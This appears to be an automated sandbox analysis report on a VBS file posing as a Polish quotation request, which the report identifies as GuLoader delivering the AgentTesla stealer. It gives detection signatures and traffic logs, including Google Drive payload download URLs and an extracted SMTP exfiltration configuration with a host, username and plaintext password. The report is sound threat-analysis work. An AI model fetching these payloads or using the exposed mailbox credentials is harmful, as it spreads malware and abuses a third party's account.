Windows Analysis Report
Zapytanie ofertowe (GASTRON 07022024).vbs

Overview

General Information

Sample name:	Zapytanie ofertowe (GASTRON 07022024).vbs
Analysis ID:	1466650
MD5:	d1d5fd7033560a49ca0f5c010a8fded5
SHA1:	d1dba8603565c80a3d7f14fe1f61a2829f56d2c9
SHA256:	e472ffd396f4c7e6b48c073ab67d8682e7ef5cd11ca9c41fbc9a447a6314d79f
Tags:	vbs
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Obfuscated command line found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Found malware configuration

Source: cmd.exe.5836.21.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fiszebrandt.pl", "Username": "andrychow@fiszebrandt.pl", "Password": "Brandt2019"}

Multi AV Scanner detection for submitted file

Source: Zapytanie ofertowe (GASTRON 07022024).vbs

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49709 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2906407950.0000000000473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: fMNDB.exe, 00000018.00000000.3022571717.0000000000161000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: wab.pdb source: fMNDB.exe, fMNDB.exe, 00000018.00000000.3022571717.0000000000161000.00000020.00000001.01000000.00000009.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49710 -> 195.128.154.10:587

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PL-SKYTECH-ASPL PL-SKYTECH-ASPL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.7:49710 -> 195.128.154.10:587

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: mail.fiszebrandt.pl

Source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftg
Source: wscript.exe, 00000000.00000003.1280734020.0000029F51607000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1276080884.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280184708.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277659585.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277953257.0000029F535BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1280734020.0000029F51607000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280909884.0000029F51634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3
Source: wscript.exe, 00000000.00000003.1280734020.0000029F51607000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280909884.0000029F51634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabI
Source: wscript.exe, 00000000.00000003.1280184708.0000029F535AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277953257.0000029F535AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277770471.0000029F535AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a79a7483e6
Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fiszebrandt.pl
Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.fiszebrandt.pl
Source: powershell.exe, 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3759400992.0000000024FCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3759400992.0000000024FCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: powershell.exe, 00000010.00000002.3021739315.0000016B58501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2909992435.0000000004531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000010.00000002.3021739315.0000016B58501000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000014.00000002.2909992435.0000000004531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.g
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.go
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goo
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goog
Source: powershell.exe, 00000010.00000002.3021739315.0000016B59DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googPz
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googl
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.c
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.co
Source: powershell.exe, 00000010.00000002.3021739315.0000016B59DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B58726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: wab.exe, 00000016.00000002.3747608661.0000000007540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1l
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_M
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mp
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpg
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-W
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WW
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWe
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeR
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeRe
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReX
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXP
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPO
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOE
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEB
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBm
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmL
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLy
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyi
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3M
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MS
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MSc
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScO
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2y
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd
Source: powershell.exe, 00000010.00000002.3021739315.0000016B58726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2ydP
Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2ydXR
Source: wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/y
Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B589C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2904249486.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=download
Source: wab.exe, 00000016.00000003.2904249486.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1X7zNlE2RMcOfu1ki717CjcNxFGPw2Whl&export=downloadtd
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B589C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1lB_Mpgj-WWeReXPOEBmLyiK3MScOb2yd&export=download
Source: powershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
